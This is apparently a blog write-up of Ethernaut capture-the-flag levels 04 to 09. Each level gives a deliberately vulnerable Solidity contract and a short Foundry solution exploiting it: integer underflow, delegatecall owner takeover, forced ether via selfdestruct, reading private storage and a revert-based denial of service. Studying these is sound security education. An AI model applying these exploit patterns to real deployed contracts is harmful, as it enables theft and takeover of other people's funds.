################################
Let's play some more Ethernauts!
################################
:slug: lets-play-some-more-ethernauts
:date: 2023-07-14
:summary: from 04-Telephone through 08-Vault
:tags: programming
:author: capu
:featured_image:

04-Telephone
============

Objective
---------
Become the contract's owner

Code
----

.. code-block:: solidity

    function changeOwner(address _owner) public {
        if (tx.origin != msg.sender) {
            owner = _owner;
        }
    }

Solution
--------
This one's cheating. Since the tests are run from a contract, ``msg.sender`` is
going to be different from ``tx.origin`` already.

A funny thing though, is that the address Foundry sets as the EOA initiating the
transactions (``0x1804c8AB1F12E6bbf3894d4083f33e07309d1f38``) has assets in a
few networks, even 0.00001 ETH on mainnet. Figuring out how is foundry's test
EOA determined is a rabbit hole for another day

05-Token
========

Objective
---------
Increase your balance from the initial 20.

Code
----

.. code-block:: solidity

    contract Token {
        mapping(address => uint256) balances;
        uint256 public totalSupply;

        constructor(uint256 _initialSupply) {
            balances[msg.sender] = totalSupply = _initialSupply;
        }

        function transfer(address _to, uint256 _value) public returns (bool) {
            // We updated this with unchecked so it behaves as per the original code
            // written to be compiled with solidity ^0.6.0
            // As of ^0.8.0, arithmetic ops will revert on over/underflow
            // On ^0.6.0, it will wrap
            unchecked {
                require(balances[msg.sender] - _value >= 0);
                balances[msg.sender] -= _value;
                balances[_to] += _value;
                return true;
            }
        }

        function balanceOf(address _owner) public view returns (uint256 balance) {
            return balances[_owner];
        }
    }

Solution
--------
Yet another one made obsolete by safety improvements to Solidity itself 🙃 now
it's clear the problem is an overflow in the transfer arithmetic. 

Particularly, the expression inside the require: ``balances[msg.sender] - _value
>= 0`` will always evaluate to ``true``, because the ``-`` operates on two
``uint256`` s, which cannot represent negative values

.. code-block:: solidity

    function solution(Token target) internal virtual {
        target.transfer(address(factory), 21);
    }

So transferring someone else more 1 more tokens than my balance will cause an
overflow and assign ``uint256(20 - 21)`` tokens to me. Which is a pretty big
number.

06-Delegation
=============

Objective
---------
Become the contract owner

Code
----
.. code-block:: solidity

    contract Delegate {
        address public owner;

        constructor(address _owner) {
            owner = _owner;
        }

        function pwn() public {
            owner = msg.sender;
        }
    }

    contract Delegation {
        address public owner;
        Delegate delegate;

        constructor(address _delegateAddress) {
            delegate = Delegate(_delegateAddress);
            owner = msg.sender;
        }

        fallback() external {
            (bool result,) = address(delegate).delegatecall(msg.data);
            if (result) {
                this;
            }
        }
    }

Solution
--------
The ``Delegation`` contract is passed the address of the ``Delegate`` at construction
time, and forwards all calls to it.

This means the code that'll actually be executed when calling anything on the
``Delegation`` contract is the one in ``Delegate``.

Then it's a matter of performing the call. It's not necessary to construct the
call manually, it's enough to cast the ``Delegation`` into a ``Delegate``

.. code-block:: solidity

    function solution(Delegation target) internal virtual {
        Delegate(address(target)).pwn();
    }


07-Force
========

Objective
---------
This challenge is a bit different, the objective being to make the Force
contract have a non-zero balance

Code
----
\...the contract is empty

Solution
--------
An empty contract will revert when called, since it doesn't have a ``receive``
or ``fallback payable`` function, rejecting ether transfers, with or without
calldata.

A workaround against this is the ``selfdestruct`` opcode, which will send ETH to
a contract with no posibility for it to reject it.

.. code-block:: solidity

    contract Emo {
        constructor()payable{} // solhint-disable no-empty-blocks
        function kms(address payable beneficiary) public {
            selfdestruct(beneficiary);
        }
    }

.. code-block:: solidity

    function solution(Force target) internal virtual {
        Emo emo = new Emo{value: 1}();
        emo.kms(payable(address(target)));
    }

08-Vault
========

Objective
---------

Code
----
.. code-block:: solidity

    contract Vault {
        bool public locked;
        bytes32 private password;

        constructor(bytes32 _password) {
            locked = true;
            password = _password;
        }

        function unlock(bytes32 _password) public {
            if (password == _password) {
                locked = false;
            }
        }
    }


Solution
--------

I think this one's gonna be pretty easy if I look into the ``VaultFactory``. The
original intended solution was probably to find the password in the level
creation transaction.

So let's take it as an opportunity to use foundry's api to inspect storage
slots instead.

.. code-block:: solidity

    function solution(Vault target) internal virtual {
        bytes32 password = vm.load(address(target), bytes32(uint256(1)));
        target.unlock(password);
    }

Curiously enough, the `load` cheatcode takes a ``bytes32`` parameter when I
always tought of the slots as being indices, which would normally be ``uint256``

It's worth noting that it's not something exclusive to foundry, and an Ethereum
RPC can answer the query just as well


09-King
=======

Objective
---------
Become the king of this contract, and also don't let anyone else become king
after you.

Code
----
.. code-block:: solidity

    contract King {
        address payable king;
        uint256 public prize;
        address payable public owner;

        constructor() payable {
            owner = payable(msg.sender);
            king = payable(msg.sender);
            prize = msg.value;
        }

        receive() external payable {
            require(msg.value >= prize || msg.sender == owner);
            king.transfer(msg.value);
            king = payable(msg.sender);
            prize = msg.value;
        }

        function _king() public view returns (address payable) {
            return king;
        }
    }


Solution
--------
Let's look into the ``KingFactory`` contract, which determines wether the
challenge is solved or not:

.. code-block:: solidity

    function validateInstance(address payable _instance, address _player) public override returns (bool) {
        _player;
        King instance = King(_instance);
        (bool result,) = address(instance).call{value: 0}("");
        !result;
        return instance._king() != address(this);
    }

The ``KingFactory`` contract, which is the ``King``'s owner, calls the fallback
function, but ignores whether it reverts or succeeds.

The ``King`` contract, however, uses a regular ``transfer``, which reverts when
the callee does.

Then, it's a matter of making a contract without a fallback/receive function
King.

.. code-block:: solidity

    contract GrumpyKing {
        function coronate(address payable where) public payable {
            where.call{value: msg.value}("");
        }
    }

.. code-block:: solidity

    function solution(King target) internal virtual {
        GrumpyKing grumpy = new GrumpyKing();
        grumpy.coronate{value: 0.001 ether}(payable(target));
    }

That was fun. See you next week!
